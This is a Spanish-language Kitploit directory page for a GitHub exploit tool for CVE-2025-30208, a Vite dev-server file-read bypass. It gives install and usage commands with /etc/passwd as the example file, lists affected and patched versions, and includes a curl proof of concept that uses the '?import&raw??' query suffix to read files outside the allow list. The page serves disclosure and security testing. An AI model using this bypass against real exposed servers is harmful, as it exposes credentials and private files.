Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-30208 — Este exploit es únicamente para fines educativos y de pruebas de seguridad éticas. El uso de este exploit contra objetivos sin consentimiento mutuo previo es ilegal, y el desarrollador rechaza cualquier responsabilidad por el mal uso o los daños causados por este exploit. | Kitploit
Herramientas/GitHubGitHub/on1onss/cve-2025-30208
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubon1onss/cve-2025-30208

CVE-2025-30208

Este exploit es únicamente para fines educativos y de pruebas de seguridad éticas. El uso de este exploit contra objetivos sin consentimiento mutuo previo es ilegal, y el desarrollador rechaza cualquier responsabilidad por el mal uso o los daños causados por este exploit.

Ver Repositorio
4hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-30208

[!IMPORTANT]

Descargo de responsabilidad

Este exploit es solo para fines educativos y de pruebas de seguridad ética. El uso de este exploit contra objetivos sin consentimiento mutuo previo es ilegal, y el desarrollador rechaza cualquier responsabilidad por mal uso o daños causados por este exploit.

Instalación

root@kitploit:~
git clone https://github.com/On1onss/CVE-2025-30208.git
cd CVE-2025-30208
pip install -r requirements.txt

Uso

root@kitploit:~
python CVE-2025-30208.py [-h] [-t <Target URL>] [-fp <File Path>] [-i]

options:
  -h, --help       show this help message and exit
  -t <Target URL>  Example: -t http://localhost:5173/
  -fp <File Path>  Example: -fp /etc/passwd
  -i               Interactive mode

Descripción

Versiones afectadas

root@kitploit:~
>= 6.2.0, < 6.2.3
>= 6.1.0, < 6.1.2
>= 6.0.0, < 6.0.12
>= 5.0.0, < 5.4.15
< 4.5.10

Versiones parcheadas

root@kitploit:~
6.2.3
6.1.2
6.0.12
5.4.15
4.5.10

Resumen

El contenido de archivos arbitrarios puede ser devuelto al navegador.

Impacto

Solo las aplicaciones que exponen explícitamente el servidor de desarrollo de Vite a la red (usando --host o la opción de configuración server.host) se ven afectadas.

Detalles

@fs deniega el acceso a archivos fuera de la lista de permitidos de Vite. Añadir ?raw?? o ?import&raw?? a la URL evita esta limitación y devuelve el contenido del archivo si existe. Esta omisión existe porque los separadores finales como ? se eliminan en varios lugares, pero no se tienen en cuenta en las expresiones regulares de la cadena de consulta.

PoC

root@kitploit:~
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
# sourceMappingURL=data:application/json;base64,eyJ2...

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  • https://github.com/advisories/GHSA-x574-m823-4x7w
  • vitejs/vite@315695e
  • vitejs/vite@80381c3
  • vitejs/vite@807d7f0
  • vitejs/vite@92ca12d
  • vitejs/vite@f234b57
Descargar herramienta